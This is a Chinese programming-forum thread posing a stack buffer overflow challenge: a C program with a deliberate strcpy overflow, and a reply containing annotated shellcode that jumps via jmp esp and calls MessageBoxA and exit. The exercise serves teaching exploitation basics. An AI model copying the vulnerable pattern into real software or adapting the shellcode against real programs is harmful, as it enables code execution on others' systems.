悬赏一百鱼币，大家一起学习C语言溢出漏洞的利用，有木有？！

小甲鱼

溢出后如下图：




含有溢出漏洞的C代码：

1. #include <stdio.h>
   
2. #include <string.h>
   
3. #include <windows.h>
   
4. 
   
5. #define PASSWORD "I_love_www.fishc.com"
   
6. 
   
7. int check_password( char *password )
   
8. {
   
9.         int flag;
   
10.         char buffer[80];
    
11. 
    
12.         flag = strcmp( password, PASSWORD );
    
13.         strcpy( buffer, password );
    
14. 
    
15.         return flag;
    
16. }
    
17. 
    
18. int main()
    
19. {
    
20.         int flag = 0;
    
21.         char password[1024];
    
22.         FILE *fp;
    
23. 
    
24.         LoadLibrary("user32.dll");
    
25. 
    
26.         if( !(fp = fopen("password.txt", "rw+")) )
    
27.         {
    
28.                 printf("Can not open password.txt!\n");
    
29.                 return 0;
    
30.         }
    
31.         
    
32.         fscanf( fp, "%s", password );
    
33.         flag = check_password( password );
    
34. 
    
35.         if( flag )
    
36.         {
    
37.                 printf("Incorrect password!\n");
    
38.         }
    
39.         else
    
40.         {
    
41.                 printf("Congratulation!\n");
    
42.         }
    
43. 
    
44.         fclose(fp);
    
45. 
    
46.         return 0;
    
47. }
    

复制代码

要求：编辑password.txt文件，运行程序，实现截图界面！

游客，如果您要查看本帖隐藏内容请回复

五月跳回家

shellcode

1. "\x66\x69\x73\x68"//前面填充80个字节栈
   
2. "\x12\x45\xfa\x7f"//jmp esp(原eip)
   
3. "\x33\xDB\x53"//xor ebx,ebx
   
4. "\x68\x63\x6F\x6D\x21"//push    216D6F63
   
5. "\x68\x73\x68\x63\x2E"//push    2E636873
   
6. "\x68\x6F\x5F\x66\x69"//push    69665F6F
   
7. "\x68\x6D\x65\x5F\x74"//push    745F656D
   
8. "\x68\x65\x6C\x63\x6F"//push    6F636C65
   
9. "\x68\x5E\x5F\x5E\x77"//push    775E5F5E;   ascii ^_^welcome_to_fishc.com!
   
10. "\x8B\xC4"//mov     eax, esp
    
11. "\x53"//push    ebx
    
12. "\x50"//push    eax
    
13. "\x50"//push    eax
    
14. "\x53"//push    ebx
    
15. "\xB8\x11\xEA\x34\x75"//mov eax,0x7534EA11 ;   我电脑上MessageBoxA的地址
    
16. "\xFF\xD0"//call eax
    
17. "\x53"//push        ebx
    
18. "\xB8\xFA\xCA\x81\x7C"//mov     eax, 7C81CAFA
    
19. "\xFF\xD0";//call eax;      exit(0)

复制代码

Ning

诱惑 挺大的坐等大牛现身！

颓废的青春

终于有动力学习啦

hostmi

坐等大牛来~~~小甲鱼什么时候可以把delphi的教程搬过去呢，期待

dongrui

最近在看甲鱼哥的汇编，c语言搞到链表吧，文件操作略有接触，对溢出目前茫然。。。

□为

先留个名，嘿嘿:lol

颓废的青春

不是原来另加300鱼币的吗，怎么改了

a22271001

刚刚还没隐贴的啊

Sen1993

这么好玩啊 看看{:1_1:}{:1_1:}

lukelqz

{:2_36:}留个名吧。c不熟

閑庭信步

有意思一定要顶起啊！

神的现身

表示不懂。。。。。。

小淘

老师已经把程序写出来了。

小甲鱼

颓废的青春 发表于 2012-8-8 22:31

                               
登录/注册后可看大图

不是原来另加300鱼币的吗，怎么改了

算算难度好像没那么大，所以改200鱼币~

小甲鱼

小淘 发表于 2012-8-8 22:44

                               
登录/注册后可看大图

老师已经把程序写出来了。

要求编辑读取的password.txt利用程序的溢出漏洞加入规定的内容~

【red_hat】田野

还没有接触者东西呢

wslray

嗯？。。。

1144290241

看看，说不定咱也能拿到手呢

颓废的青春

小甲鱼 发表于 2012-8-8 22:49

                               
登录/注册后可看大图

算算难度好像没那么大，所以改200鱼币~

我感觉挺难的，好像涉及到汇编知识，什么堆栈之类的啦